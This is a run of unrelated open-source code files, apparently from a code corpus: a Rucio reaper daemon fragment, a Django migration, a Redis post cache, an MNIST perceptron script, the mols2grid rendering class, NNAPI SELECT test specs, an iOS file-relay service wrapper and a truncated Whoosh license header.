:param exclude_rses: RSE expression to exclude RSEs from the Reaper.
:param include_rses: RSE expression to include RSEs.
:param vos: VOs on which to look for RSEs. Only used in multi-VO mode.
If None, we either use all VOs if run from "def", or the current VO otherwise.
"""
setup_logging()
if rucio.db.sqla.util.is_old_db():
raise exception.DatabaseException('Database was not updated, daemon won\'t start')
logging.info('main: starting processes')
multi_vo = config_get_bool('common', 'multi_vo', raise_exception=False, default=False)
if not multi_vo:
if vos:
logging.warning('Ignoring argument vos, this is only applicable in a multi-VO setup.')
vos = ['def']
else:
if vos:
invalid = set(vos) - set([v['vo'] for v in list_vos()])
if invalid:
msg = 'VO{} {} cannot be found'.format('s' if len(invalid) > 1 else '',
', '.join([repr(v) for v in invalid]))
raise VONotFound(msg)
else:
vos = [v['vo'] for v in list_vos()]
logging.info('Dark Reaper: This instance will work on VO%s: %s'
% ('s' if len(vos) > 1 else '', ', '.join([v for v in vos])))
all_rses = []
for vo in vos:
all_rses.extend([rse['id'] for rse in rse_core.list_rses(filters={'vo': vo})])
if rses:
invalid = set(rses) - set([rse['rse'] for rse in all_rses])
if invalid:
msg = 'RSE{} {} cannot be found'.format('s' if len(invalid) > 1 else '',
', '.join([repr(rse) for rse in invalid]))
raise RSENotFound(msg)
rses = [rse for rse in all_rses if rse['rse'] in rses]
else:
rses = all_rses
if exclude_rses:
excluded_rses = [rse['id'] for rse in parse_expression(exclude_rses)]
rses = [rse for rse in rses if rse not in excluded_rses]
if include_rses:
included_rses = [rse['id'] for rse in parse_expression(include_rses)]
rses = [rse for rse in rses if rse in included_rses]
if not rses:
logging.error('Dark Reaper: No RSEs found. Exiting.')
return
threads = []
for worker in range(total_workers):
kwargs = {'worker_number': worker,
'total_workers': total_workers,
'rses': rses,
'once': once,
'chunk_size': chunk_size,
'scheme': scheme,
'sleep_time': sleep_time}
threads.append(threading.Thread(target=reaper, kwargs=kwargs,
name='Worker: %s, Total_Workers: %s' % (worker, total_workers)))
[t.start() for t in threads]
while threads[0].is_alive():
[t.join(timeout=3.14) for t in threads]
|
web/index/migrations/0003_auto_20200407_1756.py
|
laozhudetui/LSpider
| 311 |
70615
|
<reponame>laozhudetui/LSpider<gh_stars>100-1000
# Generated by Django 3.0.1 on 2020-04-07 09:56
import datetime
from django.db import migrations, models
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [
('index', '0002_scantask_last_scan_time'),
]
operations = [
migrations.AlterField(
model_name='scantask',
name='last_scan_time',
field=models.DateTimeField(default=datetime.datetime(2020, 4, 7, 9, 56, 27, 101552, tzinfo=utc)),
),
]
|
backend/post/cache.py
|
restato/bunnybook
| 131 |
70622
|
import datetime as dt
import json
from typing import List, Optional
from uuid import UUID
from fastapi.encoders import jsonable_encoder
from injector import singleton, inject
from common.cache import fail_silently, hash_cache_key
from common.injection import Cache
from database.utils import map_to
from post.models import Post
@singleton
class PostCache:
POSTS_EX: int = int(dt.timedelta(minutes=1).total_seconds())
@inject
def __init__(self, cache: Cache):
self._cache = cache
@fail_silently()
async def get_posts(
self,
wall_profile_id: UUID,
include_friends: bool,
older_than: dt.datetime) -> Optional[List[Post]]:
cached_posts_ids = await self._cache.get(
f"walls:{wall_profile_id}:posts:"
f"{hash_cache_key(wall_profile_id, include_friends, older_than)}")
cached_posts_ids = cached_posts_ids and json.loads(cached_posts_ids)
if not cached_posts_ids:
return None
cached_posts = await self._cache.mget(
*[f"posts:{post_id}" for post_id in cached_posts_ids])
return (all(cached_posts) or None) and [map_to(json.loads(post), Post)
for post in cached_posts]
@fail_silently()
async def get_post(self, post_id: UUID) -> Optional[Post]:
cached_post = await self._cache.get(f"posts:{post_id}")
return cached_post and map_to(json.loads(cached_post), Post)
@fail_silently()
async def set_post(self, post: Post) -> None:
await self._cache.set(f"posts:{post.id}",
json.dumps(jsonable_encoder(post)),
expire=PostCache.POSTS_EX)
@fail_silently()
async def set_posts(
self,
posts: List[Post],
wall_profile_id: UUID,
include_friends: bool,
older_than: Optional[dt.date]) -> None:
params_cache_key = hash_cache_key(
wall_profile_id, include_friends, older_than)
posts_ids_key = f"walls:{wall_profile_id}:posts:{params_cache_key}"
pipe = self._cache.pipeline()
pipe.mset(posts_ids_key, json.dumps([str(post.id) for post in posts]),
*list(sum([(f"posts:{post.id}",
json.dumps(jsonable_encoder(post)))
for post in posts], ())))
for key in [posts_ids_key, *[f"posts:{post.id}" for post in posts]]:
pipe.expire(key, PostCache.POSTS_EX)
await pipe.execute()
@fail_silently()
async def unset_posts_ids(
self,
wall_profile_id: UUID,
include_friends: bool,
older_than: Optional[dt.date]) -> None:
await self._cache.delete(
f"walls:{wall_profile_id}:posts:"
f"{hash_cache_key(wall_profile_id, include_friends, older_than)}")
@fail_silently()
async def unset_post(self, post_id: UUID) -> None:
await self._cache.delete(f"posts:{post_id}")
|
Ch3/mnist.py
|
jason-168/MLCode
| 146 |
70639
|
# Code from Chapter 3 of Machine Learning: An Algorithmic Perspective (2nd Edition)
# by <NAME> (http://stephenmonika.net)
# You are free to use, change, or redistribute the code in any way you wish for
# non-commercial purposes, but please maintain the name of the original author.
# This code comes with no warranty of any kind.
# <NAME>, 2008, 2014
import pylab as pl
import numpy as np
import pcn
import cPickle, gzip
# Read the dataset in (code from sheet)
f = gzip.open('mnist.pkl.gz','rb')
tset, vset, teset = cPickle.load(f)
f.close()
nread = 200
# Just use the first few images
train_in = tset[0][:nread,:]
# This is a little bit of work -- 1 of N encoding
# Make sure you understand how it does it
train_tgt = np.zeros((nread,10))
for i in range(nread):
train_tgt[i,tset[1][i]] = 1
test_in = teset[0][:nread,:]
test_tgt = np.zeros((nread,10))
for i in range(nread):
test_tgt[i,teset[1][i]] = 1
# Train a Perceptron on training set
p = pcn.pcn(train_in, train_tgt)
p.pcntrain(train_in, train_tgt,0.25,100)
# This isn't really good practice since it's on the training data,
# but it does show that it is learning.
p.confmat(train_in,train_tgt)
# Now test it
p.confmat(test_in,test_tgt)
|
graph_explorer/test/test_structured_metrics.py
|
farheenkaifee/dashboard_3
| 284 |
70648
|
<reponame>farheenkaifee/dashboard_3
from graph_explorer import structured_metrics
def test_load():
s_metrics = structured_metrics.StructuredMetrics()
errors = s_metrics.load_plugins()
assert len(errors) == 0
|
mols2grid/molgrid.py
|
cbouy/mol2grid
| 105 |
70662
|
from typing import Type
import warnings
from base64 import b64encode
from html import escape
import json
import pandas as pd
import numpy as np
from rdkit import Chem
from rdkit.Chem import Draw
from .utils import (env,
requires,
tooltip_formatter,
mol_to_record,
mol_to_smiles,
sdf_to_dataframe,
remove_coordinates)
from .select import register
try:
from IPython.display import HTML, Javascript
except ModuleNotFoundError:
pass
else:
warnings.filterwarnings("ignore",
"Consider using IPython.display.IFrame instead")
class MolGrid:
"""Class that handles drawing molecules, rendering the HTML document and
saving or displaying it in a notebook
"""
def __init__(self, df, smiles_col="SMILES", mol_col=None, removeHs=False,
use_coords=True, coordGen=True, useSVG=True, size=(160, 120),
MolDrawOptions=None, rename=None, name="default", **kwargs):
"""
Parameters
----------
df : pandas.DataFrame or dict or list
Dataframe containing a SMILES or mol column, or dictionary
containing a list of SMILES, or list of dictionnaries containing a
SMILES field
smiles_col : str or None
Name of the SMILES column in the dataframe, if available
mol_col : str or None
Name of an RDKit molecule column. If available, coordinates and
atom/bonds annotations from this will be used for depiction
removeHs : bool
Remove hydrogen atoms from the drawings
use_coords : bool
Use the existing coordinates of the molecule
coordGen : bool
Sets whether or not the CoordGen library should be preferred to the
RDKit depiction library
useSVG : bool
Use SVG instead of PNG
size : tuple
The size of the drawing canvas
MolDrawOptions : rdkit.Chem.Draw.MolDrawOptions or None
Drawing options. Useful for making highly customized drawings
rename : dict or None
Rename the properties/fields stored in the molecule
name : str
Name of the grid. Used when retrieving selections from multiple
grids at the same time
kwargs : object
MolDrawOptions attributes
Notes
-----
The list of supported MolDrawOptions attributes are available in
https://www.rdkit.org/docs/source/rdkit.Chem.Draw.rdMolDraw2D.html#rdkit.Chem.Draw.rdMolDraw2D.MolDrawOptions
..versionchanged: 0.1.0
Added `rename` argument to replace `mapping`
"""
if not (smiles_col or mol_col):
raise ValueError("One of `smiles_col` or `mol_col` must be set")
if not isinstance(name, str):
raise TypeError(
f"`name` must be a string. Currently of type {type(name).__name__}")
Draw.rdDepictor.SetPreferCoordGen(coordGen)
if isinstance(df, pd.DataFrame):
dataframe = df.copy()
else:
# list of dicts or other input formats for dataframes
dataframe = pd.DataFrame(df)
mapping = kwargs.pop("mapping", None)
if mapping:
warnings.warn(
"`mapping` is deprecated and will be removed soon. Consider "
"using `rename` in the future."
)
rename = rename or mapping
if rename:
dataframe.rename(columns=rename, inplace=True)
self._extra_columns = ["img", "mols2grid-id"]
# generate temporary RDKit molecules
if smiles_col and not mol_col:
mol_col = "mol"
keep_mols = False
dataframe[mol_col] = dataframe[smiles_col].apply(Chem.MolFromSmiles)
else:
keep_mols = True
# remove hydrogens
if removeHs:
dataframe[mol_col] = dataframe[mol_col].apply(Chem.RemoveHs)
if not use_coords:
dataframe[mol_col] = dataframe[mol_col].apply(remove_coordinates)
# generate smiles col
if mol_col and (smiles_col not in dataframe.columns):
dataframe[smiles_col] = dataframe[mol_col].apply(mol_to_smiles)
# add index
dataframe["mols2grid-id"] = list(range(len(dataframe)))
# drop None
dataframe.dropna(axis=0, subset=[mol_col], inplace=True)
# generate drawings
self.useSVG = useSVG
opts = MolDrawOptions or Draw.MolDrawOptions()
for key, value in kwargs.items():
setattr(opts, key, value)
self.MolDrawOptions = opts
self._MolDraw2D = Draw.MolDraw2DSVG if useSVG else Draw.MolDraw2DCairo
self.img_size = size
dataframe["img"] = dataframe[mol_col].apply(self.mol_to_img)
if keep_mols:
self.dataframe = dataframe
else:
self.dataframe = dataframe.drop(columns=mol_col)
mol_col = None
self.smiles_col = smiles_col
self.mol_col = mol_col
# register instance
self._grid_id = name
register._init_grid(name)
@classmethod
def from_mols(cls, mols, **kwargs):
"""Set up the dataframe used by mols2grid directly from a list of RDKit
molecules
Parameters
----------
mols : list
List of RDKit molecules
kwargs : object
Other arguments passed on initialization
"""
mol_col = kwargs.pop("mol_col", "mol")
df = pd.DataFrame([mol_to_record(mol, mol_col=mol_col)
for mol in mols])
return cls(df, mol_col=mol_col, **kwargs)
@classmethod
def from_sdf(cls, sdf_file, **kwargs):
"""Set up the dataframe used by mols2grid directly from an SDFile
Parameters
----------
sdf_file : str
Path to the SDF file
kwargs : object
Other arguments passed on initialization
"""
mol_col = kwargs.pop("mol_col", "mol")
df = sdf_to_dataframe(sdf_file, mol_col=mol_col)
return cls(df, mol_col=mol_col, **kwargs)
@property
def template(self):
"""Kind of grid displayed, one of:
- pages
- table
"""
return self._template
@template.setter
def template(self, value):
if value not in ["pages", "table"]:
raise ValueError(f"template={value!r} not supported. "
"Use one of 'pages' or 'table'")
self._template = value
def draw_mol(self, mol):
"""Draw a molecule"""
d2d = self._MolDraw2D(*self.img_size)
d2d.SetDrawOptions(self.MolDrawOptions)
hl_atoms = getattr(mol, "__sssAtoms", [])
d2d.DrawMolecule(mol, highlightAtoms=hl_atoms)
d2d.FinishDrawing()
return d2d.GetDrawingText()
def mol_to_img(self, mol):
"""Convert an RDKit mol to an HTML image containing a drawing of the
molecule"""
img = self.draw_mol(mol)
if self.useSVG:
return img
data = b64encode(img).decode()
return f'<img src="data:image/png;base64,{data}">'
def render(self, template="pages", **kwargs):
"""Returns the HTML document corresponding to the "pages" or "table"
template. See `to_pages` and `to_table` for the list of arguments
Parameters
----------
template : str
Kind of grid to draw:
* "table" is a very simple table where all molecules are
displayed on the document, the main usecase is printing to
PDF or on paper.
* "pages" is a more interactive version that splits the
original data into several pages.
"""
self.template = template
return getattr(self, f"to_{self.template}")(**kwargs)
def to_pages(self, subset=None, tooltip=None,
cell_width=160, n_cols=5, n_rows=3,
border="1px solid #cccccc", gap=0,
fontsize="12pt", fontfamily="'DejaVu', sans-serif",
textalign="center", tooltip_fmt="<strong>{key}</strong>: {value}",
tooltip_trigger="click hover", tooltip_placement="bottom",
hover_color="#e7e7e7", style=None, selection=True, transform=None,
custom_css=None, custom_header=None, callback=None, sort_by=None):
"""Returns the HTML document for the "pages" template
Parameters
----------
subset : list or None
Columns to be displayed in each cell of the grid. Each
column's value will be displayed from top to bottom in the same
order given here. Use `"img"` for the image of the molecule.
Default: all columns (with "img" in first position)
tooltip : list or None
Columns to be displayed as a tooltip when hovering/clicking on the
image of a cell. Use `None` for no tooltip.
tooltip_fmt : str
Format string of each key/value pair in the tooltip
tooltip_trigger : str
Sequence of triggers for the tooltip: (click, hover, focus)
tooltip_placement : str
Position of the tooltip: auto, top, bottom, left, right
n_cols : int
Number of columns per page
n_rows : int
Number of rows per page
border : str
Styling of the border around each cell (CSS)
gap : int
Size of the margin around each cell (CSS)
fontsize : str
Font size of the text displayed in each cell (CSS)
fontfamily : str
Font used for the text in each cell (CSS)
textalign : str
Alignment of the text in each cell (CSS)
hover_color : str
Background color when hovering a cell (CSS)
style : dict or None
CSS styling applied to specific items in all cells. The dict must follow a
`key: function` structure where the key must correspond to one of
the columns in `subset` or `tooltip`. The function takes the item's value as
input, and outputs a valid CSS styling, for example
`style={"Solubility": lambda x: "color: red" if x < -5 else ""}`
if you want to color the text corresponding to the "Solubility"
column in your dataframe. You can also style a whole cell using the `__all__`
key, the corresponding function then has access to all values for each cell:
`style={"__all__": lambda x: "color: red" if x["Solubility"] < -5 else ""}`
selection : bool
Enables the selection of molecules and displays a checkbox at the top of each
cell. This is only usefull in the context of a Jupyter notebook, which gives
you access to your selection (index and SMILES) through
`mols2grid.get_selection()`
transform : dict or None
Functions applied to specific items in all cells. The dict must follow a
`key: function` structure where the key must correspond to one of the columns
in `subset` or `tooltip`. The function takes the item's value as input and
transforms it, for example:
`transform={"Solubility": lambda x: f"{x:.2f}",
"Melting point": lambda x: f"MP: {5/9*(x-32):.1f}°C"}`
will round the solubility to 2 decimals, and display the melting point in
Celsius instead of Fahrenheit with a single digit precision and some text
before (MP) and after (°C) the value. These transformations only affect
columns in `subset` and `tooltip`, and do not interfere with `style`.
custom_css : str or None
Custom CSS properties applied to the content of the HTML document
custom_header : str or None
Custom libraries to be loaded in the header of the document
callback : str or callable
JavaScript or Python callback to be executed when clicking on an image. A
dictionnary containing the data for the full cell is directly available as
`data` in JS. For Python, the callback function must have `data` as the first
argument to the function. All the values in the `data` dict are parsed as
strings, except "mols2grid-id" which is always an integer.
sort_by : str or None
Sort the grid according to the following field (which must be present in
`subset` or `tooltip`).
"""
if self.mol_col:
df = self.dataframe.drop(columns=self.mol_col).copy()
else:
df = self.dataframe.copy()
cell_width = self.img_size[0]
smiles = self.smiles_col
content = []
column_map = {}
width = n_cols * (cell_width + 2 * (gap + 2))
if subset is None:
subset = df.columns.tolist()
subset = [subset.pop(subset.index("img"))] + subset
# define fields that are searchable and sortable
search_cols = [f"data-{col}" for col in subset if col != "img"]
if tooltip:
search_cols.append("mols2grid-tooltip")
sort_cols = search_cols[:-1]
sort_cols.extend([f"data-{col}" for col in tooltip])
for col in tooltip:
if col not in subset:
s = f'<div class="data data-{col}" style="display: none;"></div>'
content.append(s)
column_map[col] = f"data-{col}"
else:
sort_cols = search_cols[:]
sort_cols = ["mols2grid-id"] + sort_cols
# get unique list but keep order
sort_cols = list(dict.fromkeys(sort_cols))
if style is None:
style = {}
if transform is None:
transform = {}
if tooltip is None:
tooltip = []
value_names = list(set(subset + [smiles] + tooltip))
value_names = [f"data-{col}" for col in value_names]
# force id, SMILES, and tooltip values to be present in the data
final_columns = subset[:]
final_columns.extend(["mols2grid-id", smiles])
if tooltip:
final_columns.extend(tooltip)
final_columns = list(set(final_columns))
# make a copy if id shown explicitely
if "mols2grid-id" in subset:
id_name = "mols2grid-id-copy"
df[id_name] = df["mols2grid-id"]
value_names.append(f"data-{id_name}")
final_columns.append(id_name)
subset = [id_name if x == "mols2grid-id" else x for x in subset]
# organize data
for col in subset:
if col == "img" and tooltip:
s = (f'<a tabindex="0" class="data data-{col} mols2grid-tooltip" '
'data-toggle="popover" data-content="foo"></a>')
else:
if style.get(col):
s = f'<div class="data data-{col} style-{col}" style=""></div>'
else:
s = f'<div class="data data-{col}"></div>'
content.append(s)
column_map[col] = f"data-{col}"
# add but hide SMILES div if not present
if smiles not in (subset + tooltip):
s = f'<div class="data data-{smiles}" style="display: none;"></div>'
content.append(s)
column_map[smiles] = f"data-{smiles}"
# set mapping for list.js
if "__all__" in style.keys():
whole_cell_style = True
x = "[{data: ['mols2grid-id', 'cellstyle']}, "
else:
whole_cell_style = False
x = "[{data: ['mols2grid-id']}, "
value_names = x + str(value_names)[1:]
# apply CSS styles
for col, func in style.items():
if col == "__all__":
name = "cellstyle"
df[name] = df.apply(func, axis=1)
else:
name = f"style-{col}"
df[name] = df[col].apply(func)
final_columns.append(name)
value_names = value_names[:-1] + f", {{ attr: 'style', name: {name!r} }}]"
if tooltip:
df["mols2grid-tooltip"] = df.apply(tooltip_formatter, axis=1,
args=(tooltip, tooltip_fmt, style,
transform))
final_columns = final_columns + ["mols2grid-tooltip"]
value_names = (value_names[:-1] +
", {attr: 'data-content', name: 'mols2grid-tooltip'}]")
# apply custom user function
for col, func in transform.items():
df[col] = df[col].apply(func)
if selection:
checkbox = '<input type="checkbox" class="position-relative float-left">'
else:
checkbox = ""
if whole_cell_style:
item = ('<div class="cell" data-mols2grid-id="0" '
'data-cellstyle="0">{checkbox}{content}</div>')
else:
item = ('<div class="cell" data-mols2grid-id="0">'
'{checkbox}{content}</div>')
item = item.format(checkbox=checkbox, content="".join(content))
# callback
if callable(callback):
if callback.__name__ == "<lambda>":
raise TypeError(
"Lambda functions are not supported as callbacks. Please "
"use a regular function instead.")
callback_type = "python"
callback = callback.__name__
else:
callback_type = "js"
if sort_by and sort_by != "mols2grid-id":
if sort_by in (subset + tooltip):
sort_by = f"data-{sort_by}"
else:
raise ValueError(f"{sort_by} is not an available field in "
"`subset` or `tooltip`")
else:
sort_by = "mols2grid-id"
df = df[final_columns].rename(columns=column_map).sort_values(sort_by)
template = env.get_template('pages.html')
template_kwargs = dict(
width = width,
border = border,
textalign = textalign,
cell_width = cell_width,
fontfamily = fontfamily,
fontsize = fontsize,
gap = gap,
hover_color = hover_color,
item = item,
item_repr = repr(item),
value_names = value_names,
tooltip = tooltip,
tooltip_trigger = repr(tooltip_trigger),
tooltip_placement = repr(tooltip_placement),
n_items_per_page = n_rows * n_cols,
search_cols = search_cols,
data = json.dumps(df.to_dict("records")),
selection = selection,
smiles_col = smiles,
sort_cols = sort_cols,
grid_id = self._grid_id,
whole_cell_style = whole_cell_style,
custom_css = custom_css or "",
custom_header = custom_header or "",
callback = callback,
callback_type = callback_type,
sort_by = sort_by,
)
return template.render(**template_kwargs)
def get_selection(self):
"""Retrieve the dataframe subset corresponding to your selection
Returns
-------
pandas.DataFrame
"""
sel = list(register.get_selection().keys())
return (self.dataframe.loc[self.dataframe["mols2grid-id"].isin(sel)]
.drop(columns=self._extra_columns))
def filter(self, mask):
"""Filters the grid using a mask (boolean array)
Parameters
----------
mask : list, pd.Series, np.ndarray
Boolean array: `True` when the item should be displayed, `False` if it should
be filtered out.
"""
# convert mask to mols2grid-id
ids = self.dataframe.loc[mask]["mols2grid-id"]
return self._filter_by_id(ids)
def filter_by_index(self, indices):
"""Filters the grid using the dataframe's index"""
# convert index to mols2grid-id
ids = self.dataframe.loc[self.dataframe.index.isin(indices)]["mols2grid-id"]
return self._filter_by_id(ids)
def _filter_by_id(self, ids):
"""Filters the grid using the values in the `mols2grid-id` column"""
if isinstance(ids, (pd.Series, np.ndarray)):
ids = ids.to_list()
code = env.get_template('js/filter.js').render(
grid_id = self._grid_id,
ids = ids)
return Javascript(code)
def to_table(self, subset=None, tooltip=None, n_cols=6,
cell_width=160, border="1px solid #cccccc", gap=0,
fontsize="12pt", fontfamily="'DejaVu', sans-serif",
textalign="center", tooltip_fmt="<strong>{key}</strong>: {value}",
tooltip_trigger="click hover", tooltip_placement="bottom",
hover_color="#e7e7e7", style=None, transform=None):
"""Returns the HTML document for the "table" template
Parameters
----------
subset : list or None
Columns to be displayed in each cell of the grid. Each
column's value will be displayed from top to bottom in the same
order given here. Use `"img"` for the image of the molecule.
Default: all columns (with "img" in first position)
tooltip : list or None
Columns to be displayed as a tooltip when hovering/clicking on the
image of a cell. Use `None` for no tooltip.
tooltip_fmt : str
Format string of each key/value pair in the tooltip
tooltip_trigger : str
Sequence of triggers for the tooltip: (click, hover, focus)
tooltip_placement : str
Position of the tooltip: auto, top, bottom, left, right
n_cols : int
Number of columns in the table
border : str
Styling of the border around each cell (CSS)
gap : int or str
Size of the margin around each cell (CSS)
fontsize : str
Font size of the text displayed in each cell (CSS)
fontfamily : str
Font used for the text in each cell (CSS)
textalign : str
Alignment of the text in each cell (CSS)
hover_color : str
Background color when hovering a cell (CSS)
style : dict or None
CSS styling applied to specific items in all cells. The dict must follow a
`key: function` structure where the key must correspond to one of
the columns in `subset` or `tooltip`. The function takes the item's value as
input, and outputs a valid CSS styling, for example
`style={"Solubility": lambda x: "color: red" if x < -5 else "color: black"}`
if you want to color the text corresponding to the "Solubility"
column in your dataframe
transform : dict or None
Functions applied to specific items in all cells. The dict must follow a
`key: function` structure where the key must correspond to one of the columns
in `subset`. The function takes the item's value as input and transforms it,
for example:
`transform={"Solubility": lambda x: f"{x:.2f}",
"Melting point": lambda x: f"MP: {5/9*(x-32):.1f}°C"}`
will round the solubility to 2 decimals, and display the melting point in
Celsius instead of Fahrenheit with a single digit precision and some text
before (MP) and after (°C) the value. These transformations only affect
columns in `subset` and `tooltip`, and are applied independantly from `style`
"""
tr = []
data = []
df = self.dataframe
cell_width = self.img_size[0]
if subset is None:
subset = df.columns.tolist()
subset = [subset.pop(subset.index("img"))] + subset
if style is None:
style = {}
if transform is None:
transform = {}
for i, row in df.iterrows():
ncell = i + 1
nrow, ncol = divmod(i, n_cols)
td = [f'<td class="col-{ncol}>"']
if "__all__" in style.keys():
s = style["__all__"](row)
div = [f'<div class="cell-{i}" style="{s}">']
else:
div = [f'<div class="cell-{i}">']
for col in subset:
v = row[col]
if col == "img" and tooltip:
popover = tooltip_formatter(row, tooltip, tooltip_fmt, style,
transform)
func = transform.get(col)
v = func(v) if func else v
item = (f'<div class="data data-{col} mols2grid-tooltip" data-toggle="popover" '
f'data-content="{escape(popover)}">{v}</div>')
else:
func = style.get(col)
if func:
item = f'<div class="data data-{col}" style="{func(v)}">'
else:
item = f'<div class="data data-{col}">'
func = transform.get(col)
v = func(v) if func else v
item += f'{v}</div>'
div.append(item)
div.append("</div>")
td.append("\n".join(div))
td.append("</td>")
tr.append("\n".join(td))
if (ncell % n_cols == 0) or (ncell == len(df)):
cell = [f'<tr class="row-{nrow}">']
cell.append("\n".join(tr))
cell.append("</tr>")
data.append("\n".join(cell))
tr = []
template = env.get_template('table.html')
template_kwargs = dict(
border = border,
textalign = textalign,
cell_width = cell_width,
fontfamily = fontfamily,
fontsize = fontsize,
gap = gap,
hover_color = hover_color,
tooltip = tooltip,
tooltip_trigger = repr(tooltip_trigger),
tooltip_placement = repr(tooltip_placement),
data = "\n".join(data),
)
return template.render(**template_kwargs)
@requires("IPython.display")
def display(self, width="100%", height=None, iframe_allow="clipboard-write",
**kwargs):
"""Render and display the grid in a Jupyter notebook"""
doc = self.render(**kwargs)
iframe = (env.get_template("html/iframe.html")
.render(width=width, height=height, padding=18,
allow=iframe_allow, doc=escape(doc)))
return HTML(iframe)
def save(self, output, **kwargs):
"""Render and save the grid in an HTML document"""
with open(output, "w") as f:
f.write(self.render(**kwargs))
|
tests/nnapi/specs/V1_2/select_v1_2.mod.py
|
periannath/ONE
| 255 |
70675
|
#
# Copyright (C) 2018 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
def test(name, input0, input1, input2, output0, input0_data, input1_data, input2_data, output_data):
model = Model().Operation("SELECT", input0, input1, input2).To(output0)
quant8 = DataTypeConverter().Identify({
input1: ["TENSOR_QUANT8_ASYMM", 1.5, 129],
input2: ["TENSOR_QUANT8_ASYMM", 0.5, 127],
output0: ["TENSOR_QUANT8_ASYMM", 1.0, 128],
})
example = Example({
input0: input0_data,
input1: input1_data,
input2: input2_data,
output0: output_data,
}, model=model, name=name).AddVariations("int32", "float16", "relaxed", quant8)
test(
name="one_dim",
input0=Input("input0", "TENSOR_BOOL8", "{3}"),
input1=Input("input1", "TENSOR_FLOAT32", "{3}"),
input2=Input("input2", "TENSOR_FLOAT32", "{3}"),
output0=Output("output0", "TENSOR_FLOAT32", "{3}"),
input0_data=[True, False, True],
input1_data=[1, 2, 3],
input2_data=[4, 5, 6],
output_data=[1, 5, 3],
)
test(
name="two_dim",
input0=Input("input0", "TENSOR_BOOL8", "{2, 2}"),
input1=Input("input1", "TENSOR_FLOAT32", "{2, 2}"),
input2=Input("input2", "TENSOR_FLOAT32", "{2, 2}"),
output0=Output("output0", "TENSOR_FLOAT32", "{2, 2}"),
input0_data=[False, True, False, True],
input1_data=[1, 2, 3, 4],
input2_data=[5, 6, 7, 8],
output_data=[5, 2, 7, 4],
)
test(
name="five_dim",
input0=Input("input0", "TENSOR_BOOL8", "{2, 1, 2, 1, 2}"),
input1=Input("input1", "TENSOR_FLOAT32", "{2, 1, 2, 1, 2}"),
input2=Input("input2", "TENSOR_FLOAT32", "{2, 1, 2, 1, 2}"),
output0=Output("output0", "TENSOR_FLOAT32", "{2, 1, 2, 1, 2}"),
input0_data=[True, False, True, False, True, False, True, False],
input1_data=[1, 2, 3, 4, 5, 6, 7, 8],
input2_data=[9, 10, 11, 12, 13, 14, 15, 16],
output_data=[1, 10, 3, 12, 5, 14, 7, 16],
)
|
filerelay.py
|
mountainstorm/MobileDevice
| 136 |
70677
|
#!/usr/bin/python
# coding: utf-8
# Copyright (c) 2013 Mountainstorm
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from MobileDevice import *
from amdevice import *
from plistservice import *
import os
class FileRelay(PlistService):
u'''Provides access to the file relay service; allowing you to retrive
filesets from the device in cpio.gz format'''
filesets = [
u'AppleSupport',
u'Network',
u'VPN',
u'WiFi',
u'UserDatabases',
u'CrashReporter',
u'tmp',
u'SystemConfiguration'
]
def __init__(self, amdevice):
PlistService.__init__(
self,
amdevice,
[AMSVC_FILE_RELAY],
kCFPropertyListXMLFormat_v1_0
)
def get_filesets(self, sources):
u'''retrieves the fileset/sets specified in sources; returns the data
in cpio.gz format
Arguments:
sources -- an array of source names
'''
self._sendmsg({u'Sources': sources})
reply = self._recvmsg()
if u'Status' in reply and reply[u'Status'] == u'Acknowledged':
# now read the cpio.gz file it returns
retval = ''
while True:
data = os.read(self.s, 1024)
if data is None or len(data) == 0:
break
retval += data
else:
raise RuntimeError(u'Unable to retrieve filesets: %s' % reply)
return retval
def register_argparse_filerelay(cmdargs):
import argparse
import sys
def cmd_filerelay(args, dev):
fr = FileRelay(dev)
sets = FileRelay.filesets
if args.s is not None:
sets = []
for s in args.s:
sets.append(s.decode(u'utf-8'))
f = open(args.dest.decode(u'utf-8'), 'wb')
f.write(fr.get_filesets(sets))
f.close()
fr.disconnect()
# filerelay command
filerelaycmd = cmdargs.add_parser(
u'filerelay',
help=u'retrieves filesets from the device in .cpio.gz format'
)
filerelaycmd.add_argument(
u'-s',
metavar=u'setname',
action=u'append',
help=u'the set name to retrieve; if no -s options are specified it retrieves all sets'
)
filerelaycmd.add_argument(
u'dest',
help=u'destination filename; should really end in .cpio.gz'
)
filerelaycmd.set_defaults(func=cmd_filerelay)
|
src/whoosh/query/positional.py
|
matchup-ir/whooshy
| 270 |
70689
|
<reponame>matchup-ir/whooshy
# Copyright 2007 <NAME>. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY MATT CHAPUT ``AS IS'' AND ANY EXPRESS OR
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
# EVENT SHALL MATT CHAPUT OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
